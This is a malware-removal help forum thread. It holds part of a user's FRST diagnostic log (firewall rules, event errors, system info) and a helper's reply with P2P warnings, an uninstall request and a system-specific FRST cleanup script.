FirewallRules: [TCP Query User{E45A8FBA-CC96-4DBD-907C-CD0FFA1E1E2F}C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe] => (Allow) C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe => No File
FirewallRules: [UDP Query User{71A2705A-4191-47D8-940A-1166319F2FA9}C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe] => (Allow) C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe => No File
FirewallRules: [TCP Query User{1B3540C0-880A-4830-8EA9-F4E767B15295}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe => No File
FirewallRules: [UDP Query User{7DC1365C-3980-42E2-8358-9FBD287115ED}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe => No File
FirewallRules: [{03ECDC1B-87E1-4ADD-8478-838BEA1ADAC8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe => No File
FirewallRules: [{82B24CAA-22CD-474F-9603-C584E23551C7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe => No File
FirewallRules: [{C104DE8D-F4CA-4B1B-8E31-EEEAA8A34C9E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{60FD9D66-A167-4E88-B93E-C8E846A175B3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{3F69A2ED-5DE2-4023-878A-981FC71D1A1A}] => (Allow) C:\Users\Miggy\AppData\Local\Programs\Opera GX\82.0.4227.50\opera.exe => No File
FirewallRules: [{C144C0C8-2B57-421B-86BB-1A7E3AD62915}] => (Allow) C:\Program Files (x86)\Nox\bin\Nox.exe => No File
FirewallRules: [{1F4F8DFE-0CAB-47F0-9183-053E15271167}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe => No File
FirewallRules: [{81992F8E-512D-4DA7-9DAC-488D45E25D38}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gladio and Glory\Gladio and Glory\Gladio and Glory.exe => No File
FirewallRules: [{8FA454E8-45DF-4A08-8AAA-22B1A63B59A4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gladio and Glory\Gladio and Glory\Gladio and Glory.exe => No File
FirewallRules: [TCP Query User{14653097-6416-4742-9C82-CB6934D75E94}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [UDP Query User{080D84FE-1FEF-4314-AA75-DCB6FD8301F6}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [TCP Query User{25147A68-BF60-45EC-9583-E036CA89AAF4}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Block) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{5303B7F7-593C-4FE0-8D06-028805E1A292}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Block) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{D9362094-CBEE-45FF-A39E-07BABE2891C8}C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [UDP Query User{3E2E905F-A92A-4FD0-9610-1E3EA900E7D3}C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [TCP Query User{00C1C5F8-22B4-4750-895A-C3290EB3F317}C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe] => (Block) C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe => No File
FirewallRules: [UDP Query User{47B0D35C-8AE4-4385-BD07-21CBBFD2FC47}C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe] => (Block) C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe => No File
FirewallRules: [{3B141ECB-9639-4E7F-8F76-780368F6DDFF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\VRChat.exe () [File not signed]
FirewallRules: [{34756878-EE88-4AE5-B99F-C95EF86641C8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\VRChat.exe () [File not signed]
FirewallRules: [{8F876A7A-5287-4288-BD35-11D979C8802A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Pacify\Pacify.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{7763C119-63E6-404D-9836-BD172EBE332B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Pacify\Pacify.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{04B67B1C-2819-4DBC-A81D-6C6C9EDBB6F3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{E13084FB-B670-4131-A5A7-F7DB8373FFCF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{8D2CD827-1C1D-4DA6-B7B5-8D580DE48C58}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{0104ADC6-9CAF-4DCA-BE6B-0DA2840D2800}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [TCP Query User{BEBAB357-E674-4617-BD1A-F6AB3FCDB7D2}C:\users\miggy\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\miggy\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [UDP Query User{925781FD-FCC4-432F-8C07-D07A1C5EAFC7}C:\users\miggy\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\miggy\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [{637A7132-8D14-42F8-920B-B680BCA48683}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{F64D2521-B66A-4829-8FBE-C10617C50F8D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{B59E8386-4265-4E90-BAF8-CAD8DECCE6D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{FCF2F178-BD0F-47A7-8F44-E9DCD60B4DC1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{3835BCC7-FABB-4D0F-81A0-DD004D72FD79}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> ) [File not signed]
FirewallRules: [{6E906B8E-DECB-426F-98F9-98530E0E9838}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> ) [File not signed]
FirewallRules: [TCP Query User{EA2280C2-20B0-42F1-8974-CA8D4D530938}C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe () [File not signed]
FirewallRules: [UDP Query User{E5CC6F2D-4A52-4C56-A097-FEA84E711E27}C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe () [File not signed]
FirewallRules: [{0BA33FB8-0DDA-473D-9A0F-69C2664D21D6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Poppy Playtime\PlaytimeLauncher\PlaytimeLauncher.exe => No File
FirewallRules: [{6217A59E-EBE3-4859-9E09-13C70D22D77C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Poppy Playtime\PlaytimeLauncher\PlaytimeLauncher.exe => No File
FirewallRules: [{93C48266-F67B-414C-8798-072A31D4A908}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [{573A6C3A-5FD0-496E-B86A-01C574A076AE}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [TCP Query User{0D3DB0DC-AC15-4DCC-AE15-C16DF0FA0FF8}C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [UDP Query User{34131973-3A86-4AA5-A1E3-43D38FAFCBAB}C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [TCP Query User{10B7ADFC-36E5-4136-8904-4BB2274FE63C}C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe => No File
FirewallRules: [UDP Query User{47D1A8F9-9D77-4C46-99BE-D8821B3F3E1D}C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe => No File
FirewallRules: [{FEF65CC4-341A-4FD2-A824-A6D329480713}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{6749EDCE-B127-4A53-A5AF-90CE152BAD78}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{171A237C-E9C7-4615-8B1E-5C9C788979AD}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D6F304CE-E1E7-4468-A75D-139D43303668}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{AD0903A5-230D-40EC-9560-A4EDEA0FC48D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{BAC90EB2-EF43-4263-B3F9-FC92B93BF152}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{61834926-009D-423A-BDD2-E8081CBEB7D5}C:\users\miggy\appdata\roaming\energy\energy.exe] => (Block) C:\users\miggy\appdata\roaming\energy\energy.exe => No File
FirewallRules: [UDP Query User{13EE0F33-1B8A-4274-9855-871FD73A4497}C:\users\miggy\appdata\roaming\energy\energy.exe] => (Block) C:\users\miggy\appdata\roaming\energy\energy.exe => No File
FirewallRules: [{8C3803A5-EA5C-4889-9857-9FDB4DA23242}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{01E21564-B49B-48F9-8E36-D8CF45BEEEDC}C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe => No File
FirewallRules: [UDP Query User{0F00EB50-6FA3-4928-9F2C-945043197824}C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe => No File
FirewallRules: [{6486CC56-8E36-4F5B-84C6-D5DFA851ACB3}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\103.0.1264.49\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6F92321E-DF3A-45A7-A575-6A779E9B8D46}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [{8BF615D7-A12A-483A-A40A-BFE9D6F2C0A6}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [{753ADBE4-FB37-42A8-8798-757F858B08C2}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{A6F6C4AB-87DA-4C6B-ADED-12C8F7909461}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{6717B840-E914-4EFE-BE62-1FB363E7F09A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fears to Fathom - Episode 2\Fears To Fathom - Norwood Hitchhike.exe () [File not signed]
FirewallRules: [{61A809E9-FEB5-46ED-8906-BDFAA3FF8A94}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fears to Fathom - Episode 2\Fears To Fathom - Norwood Hitchhike.exe () [File not signed]
FirewallRules: [{93A10216-66C0-42BF-ABC4-0342110C8055}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe (Warner Bros. Interactive Entertainment, Inc. -> Rocksteady Studios Ltd.)
FirewallRules: [{52240A98-1551-4AB2-B3A2-64624335D754}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe (Warner Bros. Interactive Entertainment, Inc. -> Rocksteady Studios Ltd.)
FirewallRules: [{CAAC3CD2-7CDF-4592-BFFE-01EEEA05AF16}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
FirewallRules: [{E1C306E0-1DDD-47AA-BB45-826B3153976D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
 
==================== Restore Points =========================
 
10-07-2022 16:42:28 Installed DirectX
13-07-2022 18:22:15 Removed Dual-Core Optimizer.
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
Error: (07/16/2022 12:10:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1900
Faulting application start time: 0x01d8994707d5ecc9
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 36d0ee37-f58a-43d9-be8b-9c2b8115e329
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/15/2022 11:05:01 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 103.0.5060.114 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 63d0
 
Start Time: 01d898d58448bb99
 
Termination Time: 4294967295
 
Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
Report Id: dffcbb73-8528-4d0c-8ea2-70a8d5a2c018
 
Faulting package full name: 
 
Faulting package-relative application ID: 
 
Hang type: Top level window is idle
 
Error: (07/15/2022 07:09:09 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: The storage optimizer couldn't complete retrim on \\?\Volume{31c301e6-2876-4924-31af-e66339e3d9f1}\ because: The operation requested is not supported by the hardware backing the volume. (0x8900002A)
 
Error: (07/15/2022 07:03:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x3b84
Faulting application start time: 0x01d898b787859d26
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: b97d719a-87ab-4cea-b3b9-e6f2b32fa6c1
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/15/2022 06:35:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x14d54
Faulting application start time: 0x01d898b3a05eeb43
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 71427424-3c9f-4244-8dfc-4bb4775f7720
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/14/2022 11:14:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x4b54
Faulting application start time: 0x01d898116a40ca06
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 115e5758-376d-43b8-bb14-610180db1fcd
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/14/2022 03:53:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BatmanAC.exe, version: 1.1.0.0, time stamp: 0x520000f7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000001
Faulting process id: 0x5a34
Faulting application start time: 0x01d897cab8eff5b5
Faulting application path: C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe
Faulting module path: unknown
Report Id: f43d4c35-394f-4595-a573-547c1cd90170
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/14/2022 11:42:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1904
Faulting application start time: 0x01d897b0d663f446
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 8df2ef94-e121-4e25-b9da-0d4cbd2ae1b7
Faulting package full name: 
Faulting package-relative application ID:
 
 
System errors:
=============
Error: (07/15/2022 11:55:47 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (07/15/2022 11:55:47 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (07/15/2022 11:55:42 PM) (Source: DCOM) (EventID: 10005) (User: MIGGYPC)
Description: DCOM got error "1053" attempting to start the service BcastDVRUserService_ae76358 with arguments "Unavailable" in order to run the server:
Windows.Media.Capture.Internal.AppCaptureShell
 
Error: (07/15/2022 11:55:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The GameDVR and Broadcast User Service_ae76358 service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (07/15/2022 11:55:42 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the GameDVR and Broadcast User Service_ae76358 service to connect.
 
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
 
Windows Defender:
================
Date: 2022-07-15 19:09:08
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-14 11:53:58
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-11 19:01:40
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-10 18:38:28
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-07 18:00:59
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
==================== Memory info =========================== 
 
BIOS: American Megatrends Inc. F50 11/28/2019
Motherboard: Gigabyte Technology Co., Ltd. A320M-S2H-CF
Processor: AMD Ryzen 5 3600 6-Core Processor 
Percentage of memory in use: 91%
Total physical RAM: 8139.07 MB
Available physical RAM: 705 MB
Total Virtual: 20939.07 MB
Available Virtual: 3027.04 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:475.83 GB) (Free:128.27 GB) (Model: TEAM T253X2512G) NTFS
 
\\?\Volume{590e5d8c-1754-4989-bc02-b0320b4dd94a}\ () (Fixed) (Total:0 GB) (Free:0 GB) 
\\?\Volume{2461b620-0642-4655-b8ff-4e37ffcad3aa}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
\\?\Volume{31c301e6-2876-4924-31af-e66339e3d9f1}\ () (Fixed) (Total:0.01 GB) (Free:0 GB) NTFS
\\?\Volume{a7ea1218-f889-4125-8806-9e75e9dba896}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (Protective MBR) (Size: 476.9 GB) (Disk ID: 00000000)
 
Partition: GPT.
Attempted reading MBR returned 0 bytes.
 Could not read MBR for disk 1.
 
==================== End of Addition.txt =======================


#6 axe0

Posted 17 July 2022 - 09:34 AM

Hi miggybruh,

 

Thanks for your patience.

 

Have you set policies for Windows Update?

 

I noticed qBittorrent is installed.
- Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
- They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
- Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
- The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.

It is pretty much certain that if you continue to use P2P programs, you will get infected. It is the source of the malware currently present on your computer.
I would recommend that you uninstall qBittorrent, however that choice is up to you. If you choose to remove this program, you can do so via Start > Control Panel > Add/Remove Programs.

----------------------------------------------

Uninstall Programs
The programs listed below have been identified as Potentially Unwanted Programs; please uninstall them to ensure a better clean-up.

  • Press the Windows Key + R.
  • Type appwiz.cpl in the Run box and click OK.
  • A list of programs installed will be "populated" (this may take a bit of time).
  • If they exist, uninstall the following by clicking on the below entries and selecting "Remove":
      • RestMinder


If you notice issues with uninstalling a program, please let me know.

 

----------------------------------------------

 

Run FRST Fix
Warning: This script was created for this specific system. Attempting to use the fix on another system may cause damage to the system.
Warning: After running this script you will have to log in again to any website, such as banking websites.

  • Right-click FRST64.exe then click "Run as administrator".
  • Select the entire content of the code below, including "Start::" and "End::", right-click and select "Copy".
  • Click the Fix button once and wait.
  • When finished, it will produce a log called Fixlog.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Start::
CreateRestorePoint:
CloseProcesses:
emptytemp:
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log:CCC93B07B0 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log:72C8986B20 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log_backup1:AF8AA3CDC1 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log:DE1448F4D7 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [3442]
AlternateDataStreams: C:\Users\Miggy\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Miggy\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
C:\ProgramData\DisplaySessionContainer*.log
C:\ProgramData\DisplaySessionContainer*.log_backup1
C:\Users\Miggy\AppData\Local\Programs\RestMinder
2022-07-15 22:20 - 2022-07-15 22:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\chrome_tab
2022-07-11 15:32 - 2022-07-11 15:32 - 000013970 _____ C:\WINDOWS\system32\Tasks\chrome tab
C:\users\miggy\appdata\roaming\energy
C:\users\miggy\appdata\roaming\bloom
2021-10-13 22:03 - 2021-10-13 22:03 - 000006889 _____ () C:\Users\Miggy\AppData\Roaming\9a25f6f6-1ec0-461f-a765-037f99a8a9eb.tmp
Folder: C:\Users\Miggy\AppData\Local\Enverr
Folder: C:\Users\Miggy\AppData\LocalLow\Rayll
Task: {35A6F66D-DC69-4521-8F02-D46FEAA910DC} - System32\Tasks\Microsoft\Windows\CUAssistant\CULauncher => C:\Program Files\CUAssistant\culauncher.exe (No File)
S3 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
